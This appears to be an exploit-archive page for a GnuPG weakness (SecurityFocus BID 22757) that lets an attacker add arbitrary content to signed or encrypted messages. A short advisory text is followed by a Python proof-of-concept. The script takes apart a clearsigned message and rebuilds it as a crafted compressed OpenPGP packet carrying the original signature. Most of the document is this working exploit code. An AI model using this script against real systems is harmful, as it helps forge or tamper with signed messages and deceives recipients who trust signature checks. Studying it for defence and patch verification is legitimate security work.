43 lines
No EOL
1.3 KiB
Python
Executable file
43 lines
No EOL
1.3 KiB
Python
Executable file
source: https://www.securityfocus.com/bid/22757/info
|
|
|
|
GnuPG is prone to a weakness that may allow an attacker to add arbitrary content into a message without the end user knowing.
|
|
|
|
An attacker may be able to exploit this issue in applications using GnuPG to add arbitrary content into a signed and/or encrypted message.
|
|
|
|
Exploiting this issue depends on the individual application's use of GnuPG. Individual records will be created detailing this issue in affected applications.
|
|
|
|
#!/usr/bin/python
|
|
import os, gpg, sys, base64
|
|
|
|
clear_sign = open(sys.argv[1], "rb").read().splitlines()
|
|
|
|
start = clear_sign.index("-----BEGIN PGP SIGNED MESSAGE-----")
|
|
mid = clear_sign.index("-----BEGIN PGP SIGNATURE-----")
|
|
end = clear_sign.index("-----END PGP SIGNATURE-----")
|
|
|
|
text = '\r\n'.join(clear_sign[start+3:mid])
|
|
sign = '\n'.join(clear_sign[mid+3:end-1])
|
|
|
|
onepass = gpg.OnePassSignature()
|
|
onepass['keyid'] = (0x12341234,0x12341234)
|
|
onepass['digest_algo'] = 2
|
|
onepass['pubkey_algo'] = 1
|
|
onepass['sigclass'] = 1
|
|
|
|
plain1 = gpg.Plaintext()
|
|
plain1['name'] = 'original'
|
|
plain1['data'] = text
|
|
plain1['mode'] = 0x62
|
|
|
|
signature = gpg.Raw()
|
|
signature['data'] = base64.decodestring(sign)
|
|
|
|
compressed = gpg.Compressed()
|
|
compressed['algorithm'] = gpg.COMPRESS_ALGO_ZLIB
|
|
compressed['data'] = [onepass, plain1, signature]
|
|
|
|
pkt = gpg.Packet()
|
|
pkt['version'] = 1
|
|
pkt['data'] = compressed
|
|
|
|
os.write(1,str(pkt)) |